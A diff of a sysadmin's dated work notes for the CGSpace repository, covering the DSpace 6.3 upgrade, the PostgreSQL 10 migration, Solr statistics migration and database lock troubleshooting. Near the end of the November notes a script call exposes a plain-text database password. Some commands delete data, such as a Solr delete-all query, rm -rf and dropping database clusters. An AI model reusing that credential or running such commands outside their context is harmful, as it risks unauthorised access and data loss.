facet=true&facet.field=owningComm&facet.mincount=1&facet.limit=1&facet.offset=0&stats=true&stats.field=owningComm&stats.calcdistinct=true&shards=http://localhost:8081/solr/statistics,http://localhost:8081/solr/statistics-2019,http://localhost:8081/solr/statistics-2018,http://localhost:8081/solr/statistics-2017,http://localhost:8081/solr/statistics-2016,http://localhost:8081/solr/statistics-2015,http://localhost:8081/solr/statistics-2014,http://localhost:8081/solr/statistics-2013,http://localhost:8081/solr/statistics-2012,http://localhost:8081/solr/statistics-2011,http://localhost:8081/solr/statistics-2010
+
    +
  • Then get stats themselves, iterating 100 items at a time with limit and offset:
  • +
+
facet=true&facet.field=owningComm&facet.mincount=1&facet.limit=100&facet.offset=0&shards=http://localhost:8081/solr/statistics,http://localhost:8081/solr/statistics-2019,http://localhost:8081/solr/statistics-2018,http://localhost:8081/solr/statistics-2017,http://localhost:8081/solr/statistics-2016,http://localhost:8081/solr/statistics-2015,http://localhost:8081/solr/statistics-2014,http://localhost:8081/solr/statistics-2013,http://localhost:8081/solr/statistics-2012,http://localhost:8081/solr/statistics-2011,http://localhost:8081/solr/statistics-2010
+
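  • (Those parameters can be fed to Solr’s select handler with curl, bumping facet.offset by 100 each time to page through — roughly like this against the main core, leaving out the shards parameter:)
$ for offset in 0 100 200; do curl -s 'http://localhost:8081/solr/statistics/select' --data-urlencode 'q=*:*' --data-urlencode 'rows=0' --data-urlencode 'facet=true' --data-urlencode 'facet.field=owningComm' --data-urlencode 'facet.mincount=1' --data-urlencode 'facet.limit=100' --data-urlencode "facet.offset=$offset"; done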
    +
  • I was surprised to see 10,000,000 docs with isBot:true when I was testing on DSpace Test… +
      +
    • This has got to be a mistake of some kind, as I see 4 million in 2014 that are from dns:localhost., perhaps that’s when we didn’t have useProxies set up correctly?
    • +
    • I don’t see the same thing on CGSpace… I wonder what happened?
    • +
    • Perhaps they got re-tagged during the DSpace 6 upgrade, somehow during the Solr migration? Hmmmmm. Definitely have to be careful with isBot:true in the future and not automatically purge these!!!
    • +
    +
  • +
  • I noticed 120,000+ hits from monit, FeedBurner, and Blackboard Safeassign in 2014, 2015, 2016, 2017, etc… +
      +
    • I hadn’t seen monit before, but the others are already in DSpace’s spider agents lists for some time so probably only appear in older stats cores
    • +
    • The issue with purging these using check-spider-hits.sh is that it can’t do case-insensitive regexes and some metacharacters like \s don’t work so I added case-sensitive patterns to a local agents file and purged them with the script
    • +
    +
  • +
+

2020-11-15

+
    +
  • Upgrade CGSpace to DSpace 6.3 +
      +
    • First build, update, and migrate the database:
    • +
    +
  • +
+
$ dspace cleanup -v
+$ git checkout origin/6_x-dev-atmire-modules
+$ npm install -g yarn
+$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2,\!dspace-jspui clean package
+$ sudo su - postgres
+$ psql dspace -c 'CREATE EXTENSION pgcrypto;'
+$ psql dspace -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');"
+$ exit
+$ rm -rf /home/cgspace/config/spring
+$ ant update
+$ dspace database info
+$ dspace database migrate
+$ sudo systemctl start tomcat7
+
    +
  • After starting Tomcat DSpace should start up OK and begin Discovery indexing, but I want to also upgrade from PostgreSQL 9.6 to 10 +
      +
    • I installed and configured PostgreSQL 10 using the Ansible playbooks, then migrated the database manually:
    • +
    +
  • +
+
# systemctl stop tomcat7
+# pg_ctlcluster 9.6 main stop
+# tar -cvzpf var-lib-postgresql-9.6.tar.gz /var/lib/postgresql/9.6
+# tar -cvzpf etc-postgresql-9.6.tar.gz /etc/postgresql/9.6
+# pg_ctlcluster 10 main stop
+# pg_dropcluster 10 main
+# pg_upgradecluster 9.6 main
+# pg_dropcluster 9.6 main
+# systemctl start postgresql
+# dpkg -l | grep postgresql | grep 9.6 | awk '{print $2}' | xargs dpkg -r
+
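  • (Afterwards it’s worth confirming that only the new cluster is running and re-analyzing the databases, something like — a sketch using the same postgresql-common tools:)
# pg_lsclusters
# su - postgres -c "psql -c 'SELECT version();'"
# su - postgres -c 'vacuumdb --all --analyze-in-stages'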
    +
  • Then I ran all system updates and rebooted the server…
  • +
  • After the server came back up I re-ran the Ansible playbook to make sure all configs and services were updated
  • +
  • I disabled the dspace-statistics-api for now because it won’t work until I migrate all the Solr statistics anyways
  • +
  • Start a full Discovery re-indexing:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    211m30.726s
+user    134m40.124s
+sys     2m17.979s
+
    +
  • Towards the end of the indexing there were a few dozen of these messages:
  • +
+
2020-11-15 13:23:21,685 INFO  com.atmire.dspace.discovery.service.AtmireSolrService @ Removed Item: null from Index
+
    +
  • I updated all the Ansible infrastructure and DSpace branches to be the DSpace 6 ones
  • +
  • I will wait until the Discovery indexing is finished to start doing the Solr statistics migration
  • +
  • I tested the email functionality and it seems to need more configuration:
  • +
+
$ dspace test-email
+
+About to send test email:
+ - To: blah@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: com.sun.mail.smtp.SMTPSendFailedException: 451 5.7.3 STARTTLS is required to send mail [AM4PR0701CA0003.eurprd07.prod.outlook.com]
+
    +
  • I copied the mail.extraproperties = mail.smtp.starttls.enable=true setting from the old DSpace 5 dspace.cfg and now the emails are working
  • +
  • After the Discovery indexing finished I started processing the Solr stats one core and 2.5 million records at a time:
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
+
    +
  • After about 6,000,000 records I got the same error that I’ve gotten every time I test this migration process:
  • +
+
Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+

2020-11-16

+
    +
  • Users are having issues submitting items to CGSpace +
      +
    • Looking at the data I see that connections skyrocketed since DSpace 6 upgrade yesterday, and they are all in “waiting for lock” state:
    • +
    +
  • +
+

PostgreSQL connections week +PostgreSQL locks week

+
    +
  • There are almost 1,500 locks:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+1494
+
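  • (Breaking the connections down by state helps show how many are actually “idle in transaction” versus active — something like:)
$ psql -c "SELECT datname, state, COUNT(*) FROM pg_stat_activity GROUP BY datname, state ORDER BY COUNT(*) DESC;"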
    +
  • I sent a mail to the dspace-tech mailing list to ask for help… +
      +
    • For now I just restarted PostgreSQL and a few users were able to complete submissions…
    • +
    +
  • +
  • While processing the statistics-2018 Solr core I got the same memory error that I have gotten every time I processed this core in testing:
  • +
+
Exception: Java heap space
+java.lang.OutOfMemoryError: Java heap space
+        at java.util.Arrays.copyOf(Arrays.java:3332)
+        at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
+        at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:448)
+        at java.lang.StringBuffer.append(StringBuffer.java:270)
+        at java.io.StringWriter.write(StringWriter.java:101)
+        at org.apache.solr.common.util.XML.writeXML(XML.java:133)
+        at org.apache.solr.client.solrj.util.ClientUtils.writeVal(SourceFile:160)
+        at org.apache.solr.client.solrj.util.ClientUtils.writeXML(SourceFile:128)
+        at org.apache.solr.client.solrj.request.UpdateRequest.writeXML(UpdateRequest.java:365)
+        at org.apache.solr.client.solrj.request.UpdateRequest.getXML(UpdateRequest.java:281)
+        at org.apache.solr.client.solrj.request.RequestWriter.getContentStream(RequestWriter.java:67)
+        at org.apache.solr.client.solrj.request.RequestWriter$LazyContentStream.getDelegate(RequestWriter.java:95)
+        at org.apache.solr.client.solrj.request.RequestWriter$LazyContentStream.getName(RequestWriter.java:105)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.createMethod(HttpSolrServer.java:302)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • I increased the Java heap memory to 4096MB and restarted the processing +
      +
    • After a few hours I got the following error, which I have gotten several times over the last few months:
    • +
    +
  • +
+
Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+

2020-11-17

+
    +
  • Chat with Peter about using some remaining CRP Livestock open access money to fund more work on OpenRXV / AReS +
      +
    • I will create GitHub issues for each of the things we talked about and then create ToRs to send to CodeObia for a quote
    • +
    +
  • +
  • Continue migrating Solr statistics to DSpace 6 UUID format after the upgrade on Sunday
  • +
  • Regarding the IWMI issue about flagships and strategic priorities we can use CRP Livestock as an example because all their flagships are mapped to collections
  • +
  • Database issues are worse today…
  • +
+

PostgreSQL connections week

+
    +
  • There are over 2,000 locks:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+2071
+

2020-11-18

+
    +
  • I decided to enable the rollbackOnReturn=true option in Tomcat’s JDBC connection pool parameters because I noticed that all of the “idle in transaction” connections waiting for locks were SELECT queries +
      +
    • There are many posts on the Internet about people having this issue with Hibernate
    • +
    • The locks are lower now, but Peter and Abenet are still having issues approving items and Tezira forwarded one strange case where an item was “approved” and was assigned a handle, but it doesn’t exist…
    • +
    • I sent another mail to the dspace-tech mailing list to ask for help
    • +
    • I reverted the rollbackOnReturn change in Tomcat…
    • +
    • I sent a message to Atmire to ask for urgent help
    • +
    +
  • +
  • Call with IWMI and Abenet about them potentially moving from InMagic to CGSpace +
      +
    • They have questions about the reporting on AReS
    • +
    • We told them that we can use collections to infer Strategic Priorities and Research Groups and WLE Flagships
    • +
    • It sounds like we will create this structure under the top-level IWMI community:
      • IWMI Strategic Priorities (sub-community)
        • Water, Food and Ecosystems (sub-community)
          • Sustainable and Resilient Food Production Systems (collection)
          • Sustainable Water infrastructure and Ecosystems (collection)
          • Integrated Basin and Aquifer Management
        • Water, Climate Change and Resilience (sub-community)
          • Climate Change Adaptation and Resilience (collection)
        • etc…
    • They will submit items to their normal output type collections and map to these
    +
  • +
  • In other news I finally finished processing the Solr statistics for UUIDs and re-indexed the stats with the dspace-statistics-api + +
  • +
  • Peter got a strange message this evening when trying to update metadata:
  • +
+
2020-11-18 16:57:33,309 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [Batch update returned unexpected row count from update [0]; actual row count: 0; expected: 1]
+2020-11-18 16:57:33,316 ERROR org.hibernate.engine.jdbc.batch.internal.BatchingBatch @ HHH000315: Exception executing batch [Batch update returned unexpected row count from update [13]; actual row count: 0; expected: 1]
+2020-11-18 16:57:33,385 INFO  org.hibernate.engine.jdbc.batch.internal.AbstractBatchImpl @ HHH000010: On release of batch it still contained JDBC statements
+
    +
  • Minor bug fixes to limit parameter in DSpace Statistics API + +
  • +
  • Send a list of potential ToRs for a next phase of OpenRXV development to Michael Victor for feedback: +
      +
    • Enable advanced reporting templates using “Angular expressions” in Docxtemplater (would be used immediately for IWMI and Bioversity–CIAT)
    • +
    • Enable embedding of charts like world map and word cloud in reports
    • +
    • Enable embedding of item thumbnails in reports, similar to the “list of information products”
    • +
    • Enable something like the “Statistics” Excel report Peter wanted in 2019 so we can get community and collection statistics reports
    • +
    • Add a new “metrics” block with statistics about top authors and items by number of views and downloads for the current search terms
    • +
    • Add ability to change the explorer UI to “Usage Statistics” mode where lists of authors, affiliations, sponsors, CRPs, communities, collections, etc are sorted according to the number of views or downloads for the current search results, rather than by number of occurrences of metadata values
    • +
    • Add ability to “drill down” or modify search filter terms by clicking on countries in the map
    • +
    • Enable date-based usage statistics (currently only “all time” statistics are available)
    • +
    • Fixing minor bugs for all issues filed on GitHub
    • +
    +
  • +
  • I also added GitHub issues for each of them
  • +
+

2020-11-19

+
    +
  • I started a fresh reharvest on AReS and when it was done I noticed that the metadata from CGSpace is fine, but the views and downloads don’t seem to be working
  • +
  • Peter said he was able to approve a few items on CGSpace immediately “like old times” this morning
  • +
  • The PostgreSQL status looks much better now, though I haven’t changed anything
  • +
+

PostgreSQL connections week +PostgreSQL locks week +PostgreSQL transaction log week +PostgreSQL transactions week

+
    +
  • Very curious that there was such a high number of rolled back transactions after the update
  • +
+

2020-11-22

+
    +
  • PostgreSQL situation on CGSpace (linode18) looks much better now:
  • +
+

PostgreSQL locks week +PostgreSQL transaction log week

+
    +
  • In other news, I noticed that harvesting DSpace 6 works fine in OpenRXV, but the statistics fail on page 1 + +
  • +
  • Abenet asked for help trying to add a new user to the Bioversity and CIAT groups on CGSpace +
      +
    • I see that the user search is split on five results, so the user in question appears on page 2
    • +
    • I asked Abenet if she was getting an error or it was simply this…
    • +
    +
  • +
  • Maria Garuccio sent me an example report that she wants to be able to generate from AReS +
      +
    • First, she would like to have the option to group by output type
    • +
    • Second, she would like to be able to control the sorting in the template, like sorting the citation alphabetically
    • +
    • I filed an issue: https://github.com/ilri/OpenRXV/issues/60
    • +
    +
  • +
  • Mohammad Salem had asked if there was an item ID to UUID mapping for CGSpace +
      +
    • I found a thread on the dspace-tech mailing list that pointed out that there is a new uuid column in the item table
    • +
    • Only old items have an item_id so we can get a mapping easily:
    • +
    +
  • +
+
dspace=# \COPY (SELECT item_id,uuid FROM item WHERE in_archive='t' AND withdrawn='f' AND item_id IS NOT NULL) TO /tmp/2020-11-22-item-id2uuid.csv WITH CSV HEADER;
+COPY 87411
+
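  • (Looking up a single legacy ID in that CSV is then just a grep — 74525 here is a made-up example ID:)
$ grep -E '^74525,' /tmp/2020-11-22-item-id2uuid.csv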
    +
  • Saving some notes I wrote down about faceting by community and collection in Solr, for potential use in the future in the DSpace Statistics API
  • +
  • Facet by owningComm to see total number of distinct communities (136):
  • +
+
  facet=true&facet.mincount=1&facet.field=owningComm&facet.limit=1&facet.offset=0&stats=true&stats.field=id&stats.calcdistinct=true
+
    +
  • Facet by owningComm and get the first 5 distinct:
  • +
+
  facet=true&facet.mincount=1&facet.field=owningComm&facet.limit=5&facet.offset=0&facet.pivot=id,countryCode
+
    +
  • Facet by owningComm and countryCode using facet.pivot and maybe I can just skip the normal facet params?
  • +
+
facet=true&f.owningComm.facet.limit=5&f.owningComm.facet.offset=5&facet.pivot=owningComm,countryCode
+
    +
  • Facet by owningComm and countryCode using facet.pivot and limiting to top five countries… fuck it’s possible!
  • +
+
facet=true&f.owningComm.facet.limit=5&f.owningComm.facet.offset=5&f.countryCode.facet.limit=5&facet.pivot=owningComm,countryCode
+

2020-11-23

+ +

2020-11-24

+
    +
  • Yesterday Abenet asked me to investigate why AReS only shows 9,000 “livestock” terms in the ILRI community on AReS, but on CGSpace we have over 10,000 +
      +
    • I added the lowercase formatter to all center and CRP subjects fields and re-harvested
    • +
    • Now I see there are 9,999, which seems suspicious
    • +
    • I filed a bug on GitHub: https://github.com/ilri/OpenRXV/issues/61
    • +
    +
  • +
  • Help Abenet map an item on CGSpace for CIAT +
      +
    • If I search for the entire item title I don’t get any results, but I notice this item had a “:” in the title, so I tried searching for part of the title without the colon and it worked
    • +
    • It is a mystery to me that you can’t map an item using its Handle…
    • +
    +
  • +
  • I started processing the statistics-2011 core with Atmire’s AtomicStatisticsUpdateCLI tool
  • +
  • I called Moayad and we worked on the views/downloads issue on OpenRXV +
      +
    • It turns out to be a mapping (schema) issue in Elasticsearch due to DSpace 6 UUIDs (LOL!!)
    • +
    +
  • +
+

2020-11-25

+
    +
  • Zoom meeting with ILRI communicators about CGSpace, Altmetric, and AReS
  • +
  • Send an email to Richard Fulss and Paola Camargo Paz at CIMMYT about having them work closer with us on AReS
  • +
  • Send an email to Usman at CIFOR to ask how his DSpace stuff is going
  • +
  • The Atmire AtomicStatisticsUpdateCLI tool finished processing the statistics-2017 core
  • +
  • Atmire responded about the duplicate fields in Solr and said they don’t see them +
      +
    • I sent a few examples that I found after thirty seconds of randomly looking in several Solr cores
    • +
    +
  • +
+

2020-11-27

+
    +
  • I finished processing the statistics-2016 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2015 core
  • +
+

2020-11-28

+
    +
  • I finished processing the statistics-2015 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2014 core
  • I finished processing the statistics-2014 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2013 core
  • I finished processing the statistics-2013 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2012 core
  • I finished processing the statistics-2012 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2011 core
  • I finished processing the statistics-2011 core with the AtomicStatisticsUpdateCLI tool so I started the statistics-2010 core
  • +
+

2020-11-29

+ +

2020-11-30

+
    +
  • Ben Hack asked for the ILRI subject we are using on CGSpace +
      +
    • I linked him the input-forms.xml file and also sent him a list of 112 terms extracted with xml from the xmlstarlet package:
    • +
    +
  • +
+
$ xml sel -t -m '//value-pairs[@value-pairs-name="ilrisubject"]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
+
    +
  • IWMI sent me a few new ORCID identifiers so I combined them with our existing ones as well as another ILRI one that Tezira asked me to update, filtered the unique ones, and then resolved their names using my resolve-orcids.py script:
  • +
+
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt /tmp/hung.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-11-30-combined-orcids.txt
+$ ./resolve-orcids.py -i /tmp/2020-11-30-combined-orcids.txt -o /tmp/2020-11-30-combined-orcids-names.txt -d
+# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
+
    +
  • I used my fix-metadata-values.py script to update the old occurrences of Hung’s ORCID and some others that I see have changed:
  • +
+
$ cat 2020-11-30-fix-hung-orcid.csv
+cg.creator.id,correct
+"Hung Nguyen-Viet: 0000-0001-9877-0596","Hung Nguyen-Viet: 0000-0003-1549-2733"
+"Adriana Tofiño: 0000-0001-7115-7169","Adriana Tofiño Rivera: 0000-0001-7115-7169"
+"Cristhian Puerta Rodriguez: 0000-0001-5992-1697","David Puerta: 0000-0001-5992-1697"
+"Ermias Betemariam: 0000-0002-1955-6995","Ermias Aynekulu: 0000-0002-1955-6995"
+"Hirut Betaw: 0000-0002-1205-3711","Betaw Hirut: 0000-0002-1205-3711"
+"Megan Zandstra: 0000-0002-3326-6492","Megan McNeil Zandstra: 0000-0002-3326-6492"
+"Tolu Eyinla: 0000-0003-1442-4392","Toluwalope Emmanuel: 0000-0003-1442-4392"
+"VInay Nangia: 0000-0001-5148-8614","Vinay Nangia: 0000-0001-5148-8614"
+$ ./fix-metadata-values.py -i 2020-11-30-fix-hung-orcid.csv -db dspace63 -u dspacetest -p 'dom@in34sniper' -f cg.creator.id -t 'correct' -m 240
+
diff --git a/docs/2020-12/index.html b/docs/2020-12/index.html
new file mode 100644
index 000000000..1b050b4b3
--- /dev/null
+++ b/docs/2020-12/index.html
@@ -0,0 +1,923 @@
(HTML page head, site header, and navigation markup omitted; page title: December, 2020 | CGSpace Notes)

December, 2020

+ +
+

2020-12-01

+
    +
  • Atmire responded about the issue with duplicate data in our Solr statistics +
      +
    • They noticed that some records in the statistics-2015 core haven’t been migrated with the AtomicStatisticsUpdateCLI tool yet and assumed that I haven’t migrated any of the records yet
    • +
    • That’s strange, as I checked all ten cores and 2015 is the only one with some unmigrated documents, judging by the cua_version field (a quick check is sketched after the command below)
    • +
    • I started processing those (about 411,000 records):
    • +
    +
  • +
+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2015
+
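  • For reference, a sketch of the quick check mentioned above: count the records in a core that still have no cua_version value (assuming unmigrated records are exactly the ones missing that field), for example against statistics-2015:

$ curl -g -s 'http://localhost:8081/solr/statistics-2015/select?q=-cua_version:[*+TO+*]&rows=0&wt=json'
  • Swapping the core name in the URL would show whether the other nine cores are fully migrated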
    +
  • AReS went down when the renew-letsencrypt service stopped the angular_nginx container in the pre-update hook and failed to bring it back up +
      +
    • I ran all system updates on the host and rebooted it and AReS came back up OK
    • +
    +
  • +
+

2020-12-02

+
    +
  • Udana emailed me yesterday to ask why the CGSpace usage statistics were showing “No Data” +
      +
    • I noticed a message in the Solr Admin UI that one of the statistics cores failed to load, but it is up and I can query it…
    • +
    • Nevertheless, I restarted Tomcat a few times to see if all cores would come up without an error message, but had no success (even though all cores ARE up and I can query them, sigh)
    • +
    • I think I will move all the Solr yearly statistics back into the main statistics core
    • +
    +
  • +
  • Start testing export/import of yearly Solr statistics data into the main statistics core on DSpace Test, for example:
  • +
+
$ ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
+$ ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
+$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
+
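  • To sanity-check the test import before running the delete step, a sketch of a simple count comparison (numFound in the main core should have grown by the size of the yearly core):

$ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&rows=0&wt=json'
$ curl -s 'http://localhost:8081/solr/statistics-2010/select?q=*:*&rows=0&wt=json'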
    +
  • I deployed Tomcat 7.0.107 on DSpace Test (CGSpace is still Tomcat 7.0.104)
  • +
  • I finished migrating all the statistics from the yearly shards back to the main core
  • +
+

2020-12-05

+
    +
  • I deleted all the yearly statistics shards and restarted Tomcat on DSpace Test (linode26)
  • +
+

2020-12-06

+
    +
  • Looking into the statistics on DSpace Test after I migrated them back to the main core +
      +
    • All stats are working as expected… indexing time for the DSpace Statistics API is the same… and I don’t even see a difference in the JVM or memory stats in Munin other than a minor jump last week when I was processing them
    • +
    +
  • +
  • I will migrate them on CGSpace too I think +
      +
    • First I will start with the statistics-2010 and statistics-2015 cores because they were the ones that were failing to load recently (despite actually being available in Solr WTF)
    • +
    +
  • +
+

Error message in Solr admin UI about the statistics-2010 core failing to load

+
    +
  • First the 2010 core:
  • +
+
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2010 -a export -o statistics-2010.json -k uid
+$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a import -o statistics-2010.json -k uid
+$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>*:*</query></delete>"
+
    +
  • Judging by the DSpace logs all these cores had a problem starting up in the last month:
  • +
+
# grep -rsI "Unable to create core" [dspace]/log/dspace.log.2020-* | grep -o -E "statistics-[0-9]+" | sort | uniq -c
+     24 statistics-2010
+     24 statistics-2015
+     18 statistics-2016
+      6 statistics-2018
+
    +
  • The message is always this:
  • +
+
org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error CREATEing SolrCore 'statistics-2016': Unable to create core [statistics-2016] Caused by: Lock obtain timed out: NativeFSLock@/[dspace]/solr/statistics-2016/data/index/write.lock
+
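  • A sketch of a quick check for stale Lucene lock files before removing the cores, assuming the standard core layout shown in the error above:

$ find [dspace]/solr -name write.lock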
    +
  • I will migrate all these cores and see if it makes a difference, then probably end up migrating all of them +
      +
    • I removed the statistics-2010, statistics-2015, statistics-2016, and statistics-2018 cores and restarted Tomcat and all the statistics cores came up OK and the CUA statistics are OK!
    • +
    +
  • +
+

2020-12-07

+
    +
  • Run dspace cleanup -v on CGSpace to clean up deleted bitstreams
  • +
  • Atmire sent a pull request to address the duplicate owningComm and owningColl + +
  • +
  • Abenet and Tezira are having issues with committing to the archive in their workflow +
      +
    • I looked at the server and indeed the locks and transactions are back up:
    • +
    +
  • +
+

PostgreSQL Transactions day / PostgreSQL Locks day / PostgreSQL Locks day / PostgreSQL Connections day

+
    +
  • There are apparently 1,700 locks right now:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+1739
+
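  • A sketch of a follow-up query to see which applications and connection states are holding the locks (assuming the standard pg_stat_activity columns):

$ psql -c "SELECT psa.application_name, psa.state, COUNT(*) FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid GROUP BY 1, 2 ORDER BY 3 DESC;"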

2020-12-08

+
    +
  • Atmire sent some instructions for using the DeduplicateValuesProcessor +
      +
    • I modified atmire-cua-update.xml as they instructed, but I get a million errors like this when I run AtomicStatisticsUpdateCLI with that configuration:
    • +
    +
  • +
+
Record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0 couldn't be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 64387815-d9a7-4605-8024-1c0a5c7520e0, an error occured in the com.atmire.statistics.util.update.atomic.processor.DeduplicateValuesProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
